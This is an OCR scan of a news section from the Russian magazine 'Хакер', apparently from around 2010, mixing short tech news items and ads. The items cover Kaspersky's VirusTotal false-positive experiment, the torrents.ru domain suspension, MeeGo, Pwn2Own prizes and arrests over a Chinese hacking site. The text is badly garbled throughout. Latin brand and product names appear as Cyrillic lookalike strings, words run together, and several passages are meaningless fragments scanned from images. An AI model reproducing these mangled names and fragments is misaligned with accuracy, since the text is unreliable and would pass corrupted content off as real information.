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Рад представить тебе наш новый проект : Фокус- 
группу журнала Хакер — /дгоир.хакер.ги . Идея в 
том, чтобы каждый читательжурнала могучаствовать 
вжизниХ, сообщая напрямую редакции свои мысли, 
критику и пожелания, а мы тут в редакции могли бы 
получать удобные отчеты об интересности каждого 
номера и собранные воедино отзывы и предложения. 
Открою небольшой секрет: подобная фокус-группа у 
нас существовала на протяжении последних 6 лет в 
приватном, полузакрытом режиме. Но сейчас пришло 



время изменений и мы создали специальный сайт, 
на котором ты можешь оценивать статьи номера и 
развернуто высказывать свое мнение. 

Не обошли мы стороной и мотивационный фактор: 
самым активным тестерам мы будем дарить 
различные подарки, начиная с беспроводных мышек и 
заканчивая подписками наХ. 

В общем, вперед: ЬНрѴ/дгоир.хакер.ги 
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Мы как-то уже писали про антибактериальный набор, состоящий из 
клавиатуры и мышки — за счет высокоэффективного биоцидного 
вещества, добавляемого в пластик при производстве, оба девайса 
являются для бактерий врагом номер один. И вот еще один преце- 
дент — славную традицию «стерильных» устройств ввода пополни- 
ла беспроводная клавиатура Сіеапкеуз Той сб ВепзіЛѵе от компании 
Сіеапкеуз Іпс. Здесь не используется никаких специальных ве- 
ществ, создатели вообще пошли от противного и решили, что раз уж 
грязь и микробы в основном скапливаются под клавишами, значит, 
от них просто нужно избавиться. Так Сіеапкеуз Тоисб Зепзійѵе стала 
сенсорной, то есть совершенно плоской и гладкой, согласно логике 
авторов — заразе теперь негде прятаться! Как бы оправдывая 
отсутствие кнопок, странный киборд может похвастаться трек- 
па дом, функциональной клавишей и минимал истинным, легким 
дизайном. Пожалуй, единственное, что, можетудержать любителей 
необычных гаджетов от покупки — цена устройства, все же $450 
за «стеклянную» версию и $400 за обычную, это как-то чересчур. К 
тому же не стоит забывать, что такая клавиатура лишена тактильной 
составляющей. Сразу вспоминается лазерная клавиатура, которая 
вырисовывала очертания клавиш на любой поверхности. Увы, 
после десяти минут работы на такой клаве пальцы хочется поскорее 
засунуть в ведро со льдом. 

2 МИЛЛИОНА ДОЛЛАРОВ - 
В006І-Е ПОЖЕРТВОВАЛ ШІМЕОІА 
Г01ШАТІ0Ы. 

► 004 



ВСЕ ПОБЕЖАЛИ 
И Я ПОБЕЖАЛ 



Интересную штуку вынесли на суд 
публики эксперты из Лаборатории 
Касперского, и в кои-то веки это 
вовсе не новая критическая уяз- 
вимость, не вирус и даже не весть о 
масштабной эпидемии. В ЛКпро- 
делали каверзный эксперимент: 
добавили в базу антивирусного 
проекта Ѵігиз Тоіа I [ ѵѵѵѵѵѵ.ѵі гизЫа I. 

эт і 20 чистых файлов и 1 0 из них 
отметила как малварь. Таким обра- 
зом, ожидалось проверить реакцию 
антивирусов на эффекттолпы. Дело 
втом, что при составлении баз, 
многиеантивирусные компании 
пользуются сторонними сканера- 
ми, втом числе и отѴігизТоІаІ. Итог 
эксперимента неутешителен, но 
вполне предсказуем — уже через 10 
дней все 10 ни в чем не повинных 
файлов определялись 14другими 
антивирусными сканерами, как 
вирусы. Владельцы Ѵігиз То1;аІ — 
компания НізразесЗізІетаз.уже 
заявили, что представители ЛК 



поступили некорректно, обнародо- 
вав эту информацию в ходе пресс- 
тура в Москве, а не на тематической 
конференции. Дескать, у хозяев 
Ѵігиз Тоіаі сложилось впечатление, 
чтоЛаборатория Касперского 
пытается ихочернить. В ЛКэто, 
конечно, отрицают, поясняя, что 
лишь хотели указать на многочис- 
ленные ошибки втекущей системе 
детектирования малваря, которые к 
то му же передираются другу друга. 



►1 
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ѴѴіпсІоѵѵз®. Жизнь без преград. АЗІІЗ рекомендует ОС ѴѴіпбоѵѵз 7. 




Ноутбуки А5ІІ5 серии N 
Чистый звук. Яркий цвет. 

Современная мультимедийная платформа с интерфейсом ІІ8В 3.0 



• Подлинная ОС ѴѴіпсІоѵѵз® 7 Домашняя расширенная 

• Новый процессор 2010 года ІпіеІ® Соге™ І7 

• Превосходный звук с технологией ЗопісМазІег 

• Идеальное воспроизведение видео с технологией Ѵісіео Мадіс 

Ноутбук А51І5 Ы61ф оснащенный процессором Іпіеі® Соге™ І7 и подлинной операционной системой 
ѴѴіпсІоѵѵз® 7 Домашняя расширенная, открывает двери в мир компьютерных развлечений. 
Он идеально подходит для современных мультимедийных приложений. Так, его высокоскоростной 
интерфейс 115В 3.0 позволяет передавать файлы в 10 раз быстрее, чем 115В 2.0. Просмотр 
телевизионных передач и видео в форматах НО, прослушивание МРЗ - все это доступно 
с ноутбуком А51І5 N613. Мультимедийные качества моделей серии N впечатлят любого 
пользователя. Реализованные в них технологии 5опісМазіег и Ѵісіео Мадіс обеспечивают 
поразительное качество звука и четкое, яркое изображение. С новым ноутбуком А51І5 серии N мир 
компьютерных развлечений предстанет перед вами в совершенно новом свете и звуке. 

ѵѵѵѵѵѵ.азиз.ги Всемирная гарантия 2 года Горячая линия АЗУЗ: (495) 23-11-999 



Информацию о том, где купить ноутбуки АЗІІЗ в Москве и Санкт-Петербурге, можно найти на сайте ѵѵѵѵѵѵ.азизпЬ.ги 

Владивосток: В-Лазер (4232) 218-000; ДНС (4232) 300-454; Владимир: Компьютер-Имидж (4922) 33-19-66; Воронеж: РЕТ (4732) 77-93-39; Екатеринбург: Буква (343) 22-22-025; 
Клосс (343) 216-17-01; Норд 8-800-2000-787; Ижевск: Корпорация «Центр» (3412) 91-88-11; Казань: Ноутбукофф (843) 264-39-32; Киров: Технополис (8332) 480-888; Краснодар: 
Владос (861) 210-10-01; Красноярск: Аверс (3912) 560-561; Старком (3912) 49-11-11; Липецк: Регард-тур (4742) 220-555; Новосибирск: ГОТТИ (383) 362-00-44; Левел 
(383) 212-00-05; НОТА (383) 304-10-10; Техносити (383) 22-33-770; Нижний Новгород: Алтэкс (831) 411-87-87; Норильск: Юрмала-М (3919) 46-73-36; Омск: РИТМ (3812) 20-05-08; 
Пермь: Ноутбукофф (342) 270-01-11; Ноутовъ (342) 210-10-84; Ростов-на-Дону: Иманго (863) 240-40-32; Санрайз (863) 243-65-65; Самара: Прагма (846) 270-17-01; Саратов: АТТО 
(8452) 444-111; Сургут: Компьютерный супермаркет «ПЕРВЫЙ» (3462) 247-000; Томск: Интант (3822) 56-00-56; Тюмень: Арсенал+ (3452) 797-070; Ульяновск: Симбирск-М+ 
(8422) 420-003; Уфа: Кламас (347) 291-21-12; ФортеВД (347) 260-00-00; Чебоксары: Квартон (8352) 62-55-51; Якутск: Респект (4112) 44-55-44 




Іпіеі, логотип Іпіеі, ІпіеІ Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации ІпіеІ на территории США и других стран. 



Товар сертифицирован, на правах рекламы. 




МЕ6АЫЕѴѴ5 



НОВАЯ МОБИЛЬНАЯ ОС ОТИОКІА. 
ОПЯТЬ? 



Меебо 

ЧИТАЛКИ С ЭЛЕКТРОННОЙ 
БУМАГОЙ АМА20И КШОЬЕ 
БЬЮТ ВСЕ РЕКОРДЫ - 
ПРОДАЖИ УЖЕ 
ПРЕВЫСИЛИ 3 МИЛЛИОНА 
УСТРОЙСТВ ЗА ГОД. 



Неуспелаеще отшуметь новая версия Маето, 
которую мы мучали на протяжении последних 
трех месяцев, как ІЧокіа объявила о разработке 
новой ОС. На мобильном конгрессе, прошед- 
шем недавно в Барселоне, компании N окіа и 
I пТеІ раскрыли карты, представив свое новое 
детище — ОС МееОо, предназначенную для 
мобильныхустройств — смартфонов, нетбуков, 
планшетов и иже с ними. Новинка являет собой 
не что иное, как помесь двух уже существующих 
платформ: МоЫіп (МоЬіІе Ыпих] и Маето, и она 
будет открытой — разработчики опубликуют 
все исходники. Планируется, что МееОо будет 



мирно сосуществовать с ЭутЬіап, так как ее 
собираются устанавливать только на самые 
мощные, топовые модели серий, то есть, на 
девайсы типа ІЧокіа N900. В качестве ядра 
будет использоваться стандартное ядро Ыпих 
с кегпеі.огд в специальной конфигурации и, 
в случае необходимости, патчами. В качестве 
подсистемы для реализации интерфейсом 
будет в основном использоваться Об что ничуть 
неудивительно после приобретения проекта 
компанией N окіа . Ожидается, что первые уст- 
ройства с МееОо на борту появятся в продаже 
уже в конце текущего года. 



РУССКОГО ТНЕ РІКАТЕ ВАУ НЕ ПОЛУЧИЛОСЬ 



Пішсв Премии ГАС) ЛС Іртпт. 



Мовосія і репера 




>' жапям-а* а Впадато* Преснякова 



!**«•• вййМО'и*' в фястжвам човдмд 2009 ■ Иуми в море" 




новмі пруты вооліжв 'Мой п*т* 

г- ГАгтіс.яи - *ост*нг „ 



ѴМЖМНУ4 ПОЛвММТОЛм! 



РМИ) 

Аатлргѵм» ряід 



ю февраля 2010 соде коилвяаей ‘Ру-Центр* (ѵ»*т.п»с.ги) би предупреждения. и какого либо уведомления 
было приостановлено делегирования домен* ТОЙЙРМТ5 йи По информации иі ’йу центра’ "Делегирование 
домена Т0КДЕЧТ5.ЙИ приостановлено на основании Постановления следственного отдела по чертановскому 
радону Прокуратуры г.москвы о» 16.02. 2010*". 

В * Ру- Центр" направлен соответствующий запрос, однако, весьма вероятно, что выяснение обстоятельств 
займет некоторое яреме, я течение которого адрес Сопели, оі будят недоступен 

В связи с зтин ны вынуждены были в срочном порядке сменить доменное имя на гцігвскег.огр. 

Технически, это означает что для продолжения обмена информацией ван необходимо сменить адреса трекеров 
в уже скачанных іоррент-феАлах с Ы.іогтело.гр не іл.піігаскет.от}, (вместо Ы может быть М2. М3 и М4) либо 
скачать »ти торремт файлы заново (а них уже будет новый адрес трекера) 

все остальные ссылки Форуме будут изменены автоматически, однако возможно ввн потребуется заново 
ввести логин и пароль при входа на форум, чтобы браузер запомнил новый адрес. 




Весь февраль Рунет буквально стоял на 
ушах, еще бы, ведь случилось страшное — 
правоохранительные органы посягнули на 
святая святых всех халявщиков — іоггепіз.ги ! 
Однако, при ближайшем рассмотрении, когда 
градус паники спал, а любимый народом тре- 
кер спокойно возродился по адресу гиігаскег 
огд . стало ясно, что дело мутное. 

Итак, по порядку: делегирование домена 
іюггепіъ.ги было приостановлено регистра- 
тором «Ру-Центр» по представлению отдела 
СКП по Чертановскому району Москвы. СКП 
поясняет — 26 января текущего года некий 
житель Москвы «записал на жесткий диск 
ЭВМ» контрафактную русскую версию про- 
граммы АиІюСАЭ от компании Аиіюсіезк. Хуже 
того, он получил за это вознаграждение в 
размере 1,5 тысячи рублей. О причастности к 
этим страшным махинациям трекера Іоггепіз.ги 
следователи, судя по всему, уже догадались 
сами (каким именно образом, неизвестно] и 
обратились в «Ру-Центр» с просьбой при- 
остановить делегирование домена на время 
проведения предварительного следствия, 
ради «предотвращения совершения подобных 
преступлений». 

И все бы ничего, да только вот компании 
Аиіюсіезк, а также 1 С, которую тоже пыта- 
лись приплести к общей неразберихе, четко 
заявили, что инициаторами по этому делу ни 
в коем случае не являются, никаких исков не 
подавали и никаких претензий к трекеру у них 
нет. Для полноты картины добавим, что сами 
админы Іоггепіз.ги узнавали о происходящем 
из тех же источников, что и взволнованные 
пользователи — из СМИ, связаться с коман- 
дой трекера никто не пытался, и никаких 
уведомлений им не приходило. Весь этот хаос 
мистическим образом совпал с открытием 



«первого легального онлайн-кинотеатра 
Рунета» ЕКіпоТ.ги, и визитом в Россию деле- 
гации сильных мира ІТ — представители еВау, 
ТѵѵіМег, Сізсо Эузіютз, Ноуѵсазі:, ЕбѵепШге, 
ЭосіаІ Оатіпд Ыеіѵѵогк и МогіІАа, ученые и 
военные приезжали обмениваться опытом. 

В составе делегации, например, присутство- 
вали основатель Туѵіиег Джек Дорси и Эштон 
Кутчер, который не только актер, но и испол- 
нительный директор Саіюіуз. 

«Что в итоге?» — спросишь ты? В итоге, 
Огеатіоггепі: (владельцы Іоггепіз.ги ] наме- 
реваются подать в суд на «Ру-Центр», к кото- 
рому теперь имеется много вопросов — как 
ни смешно, с юридической точки зрения 



случившееся выглядит скверно, и может 
выйти боком именно «Ру-Центру». Сам трекер 
с редкими перебоями продолжает работу по 
новому адресу, где до него не могут добраться 
наши власти, а старый домен администрация 
планирует вернуть только ради восстановле- 
ния справедливости и редиректа. Понятное 
дело: авторитет всей зоны .ги сильно подор- 
ван. Да и работы у Іоггепіз.ги прибавилось: 
уже несколько раз автор замечал текстовую 
страницу СЬегокее ( уѵѵуѵу.сбегокее-рпзіесі:. 
сот ) — очень шустрого веб-сервера, который, 
по всей видимости, используется в качестве 
НТТР-демона. Работу сервера после переезда 
приходится отлаживать. 



ТШТЕК ПРОДОЛЖАЕТ РАСТИ: ПЛАНКА В 1 МИЛЛИАРД ТВИТТОВ В МЕСЯЦУЖЕ 
ПРОЙДЕНА. И КАЖДЫЙ МЕСЯЦ ЭТА ЦИФРА УВЕЛИЧИВАЕТСЯ ПРИМЕРНО НА 17 %. 



► ооб 
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МеІаТгасІег4 



На сегодняшний день информационно- 
торговая платформа МеІаТгайег явля- 
ется одним из самых популярных 
и передовых инструментов для работы 
на финансовых рынках. Терминал 
позволяет торговать самыми разными 
финансовыми продуктами: валютами, 
контрактами на разницу (СЕБ) на акции 
и фьючерсы с одного счета. 



Воплощение концепции «все-в-одном» 

возможность анализировать динамику финансовых инструментов, 
совершать торговые операции, создавать и использовать программы 
автоматического трейдинга; 

Простота в использовании 

русскоязычное меню, возможность работать, не устанавливая програм- 
му на компьютер, понятный и удобный интерфейс, возможность 
торговать прямо с графиков; 

Соответствие последнему слову в ІТ-разработоках для финансового 
сектора 

\ѴАР, версия для КПК и смартфона; возможность работы через 
крупнейшую систему электронной торговли (ЕС№) Сштепех; 
Полноценная информационная поддержка клиентов 
круглосуточный пакет новостей оп-1іпе для клиентов от информационных 
агентств Беж Лопез №\У8\ѵігез и «Прайм-ТАСС». 



Компания «Альпари» 

Профессиональные услуги на финансовых рынках 

8 ( 800 ) 200 - 01-31 

Звонок по России бесплатный 

ѵ\ллп/ѵ.а1рагі.ги 






Москва: Руновский переуолк, д. 1 0; (495) 710-76-76. Санкт-Петербург: ул. Ефимова, д. 4А, оф. 405; (81 2) 441 -29-30, 441 -29-31 , В. О. 26-я линия, 
д. 15, кори. 2, оф. 5.7; (812) 322-22-41, 322-44-47. Ростов-на-Дону: пр. Буденновский, д. 60, оф. 1201; (863) 218-18-00, (863) 218-18-05. 
Новосибирск ул. Ленина, д. 52, 8 этаж, оф. 804; (383) 287-25-43, 238-07-53. Екатеринбурі пр. Ленина, д. 25, оф. 4.1 15; (343) 378-20-38. 
Нижний Новгород: ул. Ульянова, д. 26/1 1 , оф. 1 307; (831 ) 41 4-73-80, 41 1 -73-80,41 1 -82-67. Казань: ул. Спартаковская, д. 6, 1 4 этаж, оф. 1 408; (843)526-5540. 



МЕ6АЫЕѴѴ5 



ПОКАЗАТЕЛЬНЫЕ ВЫСТУПЛЕНИЯ ХАКЕРОВ 




16-го февраля, в 10 часов утра в виртуальное 
пространство США вторглись неизвестные ки- 
бертеррористы и провели массированную атаку 



на американские ресурсы. Звучит впечатляю- 
ще, верно? Воттакой необычныйтренингпод 
названием СуЬегЗЬоскѴѴаѵе провел амери- 
канский политологический институт Вірагбзап 
Роіісу Сепіег. Все происходило при открытых 
дверях, с прямой трансляцией на СІЧІМ. Ха- 
керские игры в войнушку были спланированы 
крайне серьезно: для необычного реалити-шоу 
в Вашингтоне построили точную копию Ситуа- 
ционной комнаты Белого Дома, где собрались 
такие видные фигуры, какбывший министр на- 
циональной безопасности Майкл Чертофф, экс- 



заместительдиректора ЦРУ Джон Маклафлин 
и другие консультанты, специалисты и высшие 
офицеры. Короче говоря, со всем американс- 
ким пафосом, который можнотолько предста- 
вить. Такиеучения впервые проходили «на 
публику», и собравшиеся не забывали играть 
роли, изображая действующих высших чинов, 
и комментировать происходящее вугоду зрите- 
лям. Воттолько одно интересно. Посещала ли 
высших чинов спецслужб и прочих официаль- 
ных лицта же мысль, что и нас сейчас: «Им что 
делать больше нечего что ли» :]. 



В КОМПАНИИ 5ТПАТЕ6Ѵ АИАІ.ѴТІС5 СЧИТАЮТ, ЧТО К 2016 ГОДУ 
90% АВТОМОБИЛЕЙ БУДУТ ИМЕТЬ ДОСТУП К СЕТИ. 

ХАЛЯВА, СЭР 



Ну кто, скажи мне, нелюбитхаляву?Особеннотакую, за которую не жаждут настучать по 
голове вездесущие борцы за авторское право! Скажешь: «такой не бывает»? Конечно, 
бывает! Очередная благая попытка монетизации и легализации видеоконтента была 
предпринята компанией ОідііаІАссезз. 26 февраля ОідііаІАссезз за пустила сервис іѵі. 
Ш, который уже сейчас содержит более 9.000 часов разной вкуснятины — здесь есть и 
сериалы и фильмы, и мультики и аниме, и научно-популярные передачи, и многое дру- 
гое. Более сотни правообладателей дали добро на использование своих материалов. 
На резонный вопрос«и вчем подвох?», отвечаем — его, фактически, нет — зараба- 
тывать сайт будет толь ко за счет видеорекламы, прокрутить или отключить которую 
невозможно. Натекущий момент, это более чем приемлемый компромисс в противо- 
стоянии «пользователи ѵз копирасты». іѵі.ги не первый подобный проект: существует 
также игаѵо.іѵ . но контент ресурса почти полностью состоит из фильмов 30-х годов. У 
РатЫегбыла попытка запустить похожий проект«Кинозал», неувенчавшая успехом, 
и так далее. Но, несмотря на неудачи коллег, в БідііаІАссезз настроены решительно и 
довольно оптимистично — планируется нетолько активно развивать ресурс, но к 201 1 
году предполагается занять 20% российского рынка сетевой видеорекламы. Отметим, 
что сервис сделан довольно добротно. 



МОРОЗЫ КРЕПЧАЮТ: 

У СБЕРБАНКА ЗАМЕРЗАЛ 
КАЖДЫЙ 44-Й БАНКОМАТ 




НЕ ИБАЙ, НО ИБЭЙ, ВСТРЕЧАЕМ РУССКИЙ ИНТЕРФЕЙС 






торговым цомтр 




ТЗ.Гп-І 










Воти случилосьто, чего многиедавнождали — крупнейший сетевой аукцион еВау 
повернулся к России передом, объявив, что 1 6 марта открывается доступ к русско- 
язычной версии сайта. Очень радужное событие, которое наверняка поспособствует 
развитию сервиса в России, если бы не несколько «но». По сути, все, что мы пока имеем 
— перевод интерфейса аукциона на русский язык, поддержку поисковыхзапросов на 
русском и, еще один весомый плюс в лице русскоязычной техподдержки. В остальном, 
никаких перемен — никакого представительства еВау в России пока не будет, а оплата 
лотов по-прежнему происходит через РауРаІ, который в нашей чудной стране, увы, 
можно использовать только для оплаты, но никакие на прием денежных средств. «Ну 
и ладно», скажешьты — «все равно ничего продавать сам не буду». Увы, кактолько 
ты по какой-то причине (например, разбитой посылки из-за неправильнойупаковки) 
захочешь вернуть товар, оплаченный «палкой», жди сюрприз: деньги не придут. В 
качестве утешения тебе дадут ваучер на скидку, эквивалентный потраченной сумме: 
но именно денег, живых и осязаемых, нет! Радует одно — еВау, наконец, обратил свой 
взгляд в нашу сторону, и даже провел переговоры с нашими платежными системами о 
возможном сотрудничестве и дальнейшем развитии русскоязычного сервиса. Скрес- 
тим пальцы и подождем. 



► 008 
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> ДОВЕРЬТЕ ТОЗНІВА 



СОЗДАНИЕ ЕЩЕ 
ОДНОГО ШЕДЕВРА 

Что делает искусство искусством? Преданность своему делу? 
Мастерство? Количество часов, потраченных на создание 
произведения? 



Или искусство рождается в слиянии страсти и инноваций? 



со 

2 

СО 

с; 

си 

о_ 



Истинная красота нашей новой линейки ЗаІеІІіІе - в гармоничном 
сочетании всего этого. Но шедевр, которым мы гордимся 
даже больше - это ваше доверие, которого мы достигли, 
прислушиваясь к вам на протяжении более чем 25 лет и 
меняясь, чтобы соответствовать вашим потребностям. 

Это и есть искусство понимания, которое проявляется 
во всем, что мы делаем. 



ЗпіеШіе 



Насладитесь всеми нашими шедеврами, включая новый 
ЗаІеІІКе І_500, оснащенный процессором 1п{е1 @ Соге™2 Эио. 
Спрашивайте в магазинах или зайдите на ѵѵѵѵѵѵ.іозІііЬа.ги. 





> 5АТЕШТЕ І_500 

До процессора ІпіеІ® Соге™2 Рио 

Лицензионная ОС ѴѴіпсІоѵѵз® 7 
Ноте Ргетіит 

Стандартная цифровая 
клавиатура 

Сенсорная панель с технологией 
Миііі Тоисіп 

ЫЗВ с технологией 
ЗІеер-апсІ-СПагде 



От 20 000 рублей* 



*Цены могут отличаться от указанных. 



ТОЗНІВА 

І_еасПпд Іппоѵаііоп >» 





МЕ6АЫЕѴѴ5 



ОНаНг 




КИТАЙСКАЯ МОЛОДЕЖНАЯ 
АССОЦИАЦИЯ ПО РАЗВИТИЮ 
СЕТИ ПОДСЧИТАЛА, ЧТО В 
ПОДНЕБЕСНОЙ УЖЕ НАБРАЛОСЬ 
24 МИЛЛИОНА ИНТЕРНЕТ- 
ЗАВИСИМЫХ. 





ЕСЛИ ОЧЕНЬ ХОЧЕТСЯ 
05 В 3.0 

Системные платы с интерфейсами 115В 3.0 и 5АТА6 Гбит/с 
уже добрались до прилавков магазинов, и производители 
периферии не отстают — анонсы новыхдевайсов, заточенных 
под новые стандарты, выходят почти ежедневно. Но, что если 
полномасштабный апгрейд ты пока делать не собираешься, 
а пользоваться последними достижениями прогресса все 
равно хочется? В таком случае можешь обратить внимание на 
плату расширения (ЗА-ІІ5ВЗ.О от компании ОідаЬііе. Карточка 
подключается к шине РСІ-ЕхргеззхІ и предоставляет в твое 
полное распоряжение два слота 115В 3.0. Отдругиханалогич- 
ныхустройств 6А-ІІ5В3.0 отличают печатная плата с двойным 
слоем меди и разъемы электропитания Моіех, улучшающие 
втри раза питание подключенных к плате устройств. Цена 
девайса равна $40. 



МИКРОБЛОГИ БЫЛИЛЕПЕРЬ 
МИКРОПЛАТЕЖИ 

Один из создателей непотопляемого трекера ТЬе РігаТе Вау Питер Сунде, запустил бета- 
тестсвоего нового проекта Ріай г— сервиса социальных микроплатежей. Идея Сунде, 
ярого активиста и борца с копирайтерами, была проста и, вполне возможно, гениальна — 
он хотел упростить до максимума процесс денежного поощрения авторов любого контента, 
будьто музыка, стихи, кино или софт. Для этого придумана следующая схема: пользователь 
заводит себе аккаунт в системе Ріайг и пополняет свой с чет, до пустим, на $10. Авторы кон- 
тента, в свою очередь, размеща юту себя на сайтах, в блогах или где-то еще Ріайг-кнопки. 
Если пользователю нравится контент, он может кликнуть по Еіайг-кнопке, выразив свою 
признательность в финансовом эквиваленте. Да, всего одним кликом. Интересно и то, 
что можно кликнуть по кнопке один раз, а можно и сто, обиженным все равно не останется 
никто, и вот почему. Система раз в месяц будет производить расчет, сколько раз пользова- 
телькликал по Ріайг-кнопкам, и разделит сум му, находящуюся на его счету поровну, между 
всеми поощренными авторами. То есть, если юзер кликнул по 1 0 авторам, каждый из них 
получил $1 , если по 1 00 — $0,1 . Теперь главный вопрос втом, приживется ли эта схема. А 
идея бесспорно интересная. 



ТЕХНОЛОГИЯ ИѴШІА ОРТІМІІЗ 

Хорошие новости пришли из стана компании ІМѴЮІА: похоже, нужда искать компро- 
мисс между высокой производительностью и длительным временем работы ноутбука 
скоро отпадет. Благодаря технологии ІМѴЮІА Орбітшз пользователь получит возмож- 
ность переключаться между дискретным и интегрированным графическим процес- 
сором и самостоятельно решать, что ему нужнее на текущий момент — заряд батарей 
или быстродействие. Сами представители ІМѴЮІА сравнивают свою разработку с 
гибридными автомобилями, где в зависимости отситуации используется электричес- 
кий двигатель или двигатель внутреннего сгорания. Ноутбуки, стехнологией ІМѴЮІА 
Оріітиз на борту, появятся совсем скоро, ожидается, что одними из первых моделей 
ста нут А5 II 5 ІІБбСМ, ІМ6Щ ІМ7Щ N82^ и ШСЕІс. 




СІСАВУТЕ 



«Ліг* ОигаЫ*«Д Х0 

нсИпсІвду им ^ 
Яйі еорриг рев свпдп 



ІДв ЮпгІЧі Гии и $8 

ЛИрЬ 1 ' 



ОЫВОАВІ} АССЕ1ЕКМ\ОН 



► 010 
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ОТКРОЙ 
СТРАНУ ИГР 



СЕКС С БОГИНЕЙ в сор ОР ѴѴАВ III 






ІТѴВДЩР1ПКПЯ 



*ѵл * 

■ Л ^ 

ЛР* 




МЕ6АЫЕѴѴ5 



ФИНАЛЬНАЯ 



СП 
РАО 






ИФИКАЦИЯ 
ОИ НО 5830 



Компания АМБ представила новинку — 30 
графический ускоритель АТІ Вабеоп НО 5830, 
и не прошло и пары дней послеанонса, как 
в сети появилась информация о моделях от 
таких производителей какОідабуІе, ЗаррЫге, 
ХРХ и так далее. Что и говорить, эту карту от 
АМО действительно ждали. АТІ Вабеоп НО 
5830 ориентирован в первую очередь на 
геймеров и по производительности займет 
место между моделями 5770 и 5850. Стоимос- 
тью новинка немного уступит АТІ Вабеоп НО 
5800 — цена составитоколо $240. Технические 
характеристики таковы: карта построена на 
базе 40-нанометрового ядра Сургезз и может 
похвастаться 1 1 20 потоковыми процессорами, 
56 текстурными блоками и 1 Гб памяти СООГ5. 
Частоты ядра и памяти равны 800 и 4000 МГц 
соответственно. Основными фишками и удобс- 
твами АТІ Вабеоп НО 5830 являются поддержка 
БігесіХ 1 1 , АТІ ЕуебпТу, СгоззРігеХ и АТІ Зігеат. 
Исходя из соотношения мощности и цены, 
можно почти с полной уверенностью сказать, 
что Вабеоп НО 5830 станет популярным «на- 
родным» продуктом. 




ШКОЛА ХАКЕРОВ 

□ Шр:/А№ж. зесаьь ем * к §|' 

тжя-ш х\& 



МАЛЕНЬКИЙ, „ 
ДА УДАЛЕНЬЯМИ 



Если тебе для каких-то целей нужен микрокомпьютер и при этом как мож- 
но более дешевый, нужно обязательно взглянуть на новинку от компании 
Сіобаізсаіе — СигиРІид Зегѵег. Все просто. За 99 долларов™ получаешь 
крохотных размеров коробочку, в которой умещается полноценный 
сервер на процессоре АРМ: Магѵеіі КігкѴѴоогб 1 .2 ГГц, 512 ООР2800 МГц, 
адаптер 802.1 1 д, В ІиеІооіЬ- модуль, при этомутебя естьгигибитный порт 
ВЬегпеТ 2 ІІ5В2.0, для подключения чего пожелаешь. Система работает 
на специально переработанной для АРМ-процессоров версии ОеЬіап с 
пропатченным ядром 2.6.32, а, значит, ты сможешь приспособить коробоч- 
ку для чего угодно. Если одного порта ЕіЬегпеІтебе мало или есть необхо- 
димость в подключении девайсов через еЗАТА, то можно заказать версию 
РШ5 — она на 30 долларов дороже. Заказатьдевайс можно на сайте ѵѵѵѵѵѵ. 
дІоЬаІзсаІеІесбпоІодіез.сот и ждать отгрузки уже в конце апреля, правда, 
придется использовать посредника вроде зЬіріІо.сот . потому как прямой 
доставки в Россию нет. Нолюбыезатраты, даже нетакие большие, должны 
слихвой компенсироваться малым энергопотреблением: всего 5 Ватт 
вместо 175 Ваттобычного десктопного компьютера. 





штшвт, аягн 

ттх&і 



В Китае арестованы три человека по подозрению во владении и управ- 
лении ошеломляюще успешным проектом Віаск Наѵѵк ЗабеЕу N еі; 
[ 3800Ьк.сот ]. при этом сам сайт сейчас находится в дауне. У этого ресурса, 
целиком посвященного взлому, пентесту, созданию малвари было огром- 
ное количество подписчиков, причем 1 2000 пользователей не скупились 
на платные подписки. Всегос 12000 ѴІР-пользователей ресурс получил 
более 650000 юаней — это больше чем миллион американских баксов. 
Помимотрех арестов, была также осуществлена конфискация девяти сер- 
веров, пяти компьютеров и одного автомобиля. Бэкапы всех баз, впрочем, 
сохранялись и сейчас доступны на приватных китайских форумах. 



ПО ДАННЫМ ѴѴІМАХ РОКОМ, ДОСТУПОМ 
К ѴѴІМАХ СЕТЯМ УЖЕ СЕГОДНЯ МОГУТ 
ВОСПОЛЬЗОВАТЬСЯ БОЛЕЕ 620 МЛН. 
ЧЕЛОВЕК, А К 2011 ГОДУ ЭТА ЦИФРА 
ДОСТИГНЕТ 1 МЛРД. 



► 012 
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РУССКОЯЗЫЧНЫЙ РАЗДЕЛ 
ВИКИПЕДИИ ВЗЯЛ ОТМЕТКУ 

В 500000 СТАТЕЙ! для 

СРАВНЕНИЯ: СТАТЕЙ НА АНГЛИЙСКОМ 
В ВИКИ ЧУТЬ БОЛЬШЕ 3-Х МИЛЛИОНОВ 



РШОІШОІО 



Пока разработчики боодіе 
СЬготе обещают каждому на- 
шедшему серьезный ба г $ 1 337, 
на конкурсе Р\л/п20ѵѵп, проходя- 
щем в рамках зесигііу-конфе- 
ренции СапЗесѴѴезі: в Ванкуве- 
ре, можно урвать куш побольше. 
Мероприятие проходитуже 
4-ый год подряд, и в этом году 
призовой фонд увеличился до 
$100000. Чуть меньше полови- 
ны всех поощрений — $40000, 
выделяется на соревнова- 
ния сплоитов для браузеров 
(МісгозоіТ Іпіегпеі Ехріогег, 
Могіііа Рігеіюх, Соодіе Сбготе, 
Ар р Іе Заіагі], запущенные на 
разных ОС (ХР Ѵі зЕа , ѴѴіпбоѵѵз 
7, Мас05Х5поѵѵРеорагсІ]. При 
этом большая часть призового 
фонда идет на другое направле- 



ние конкурса — взлом мобиль- 
ных платформ. В качестве целей 
предлагается Ар р Іе іРбопе 
305, РІМ ВІаскЬеггу ВоШ 9700, 

N окіа девайсы на базе ЗутЬіап 
560 (например, Е62) , а также 
телефон Моіогоіа на платформе 
Ооодіе Апбгоіб. Цель во всех 
случаях одна — выполнение 
кода на удаленной системе. В 
прошлом году, в первый же день 
были представлены рабочие 
сплоиты для 5а ба гі , Рігеіюх и 
даже Іпіегпеі Ехріогег 8, релиз 
которого появился за пару дней 
до мероприятия (отличился 
хакер с ником ІЧіІз — он на фото], 
при этом ни одной успешной 
атаки на телефон так и не про- 
изошло. Дерзай? 





Іпзрігіпд Іппоѵаііоп • Регзізіепі РегГесІіоп 



іИЩІНіЧІфН 

его беспроводного комфорта 



2 Комфортная скорость для всех приложений! 
Графическая настройка приоритетов 

Удобное перераспределение ширины канала между такими приложениями, 
как голосовые программы, игры, приложения, использующие потоки аудио 
и видео, а также РТР и Р2Р 



Не требует специальных знаний! 

Быстрая настройка беспроводной сети и Іпіегпеі 

Утилита АЗУЗ ЕІЗеІир/ ѴѴР5 ѴѴІгагсІ - настройка защищенной беспроводной сети 
и Іпіегпеі-соединения за 2 минуты с предустановками для провайдеров более 
чем в 100 городах России 
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Универсальность и функциональность! 
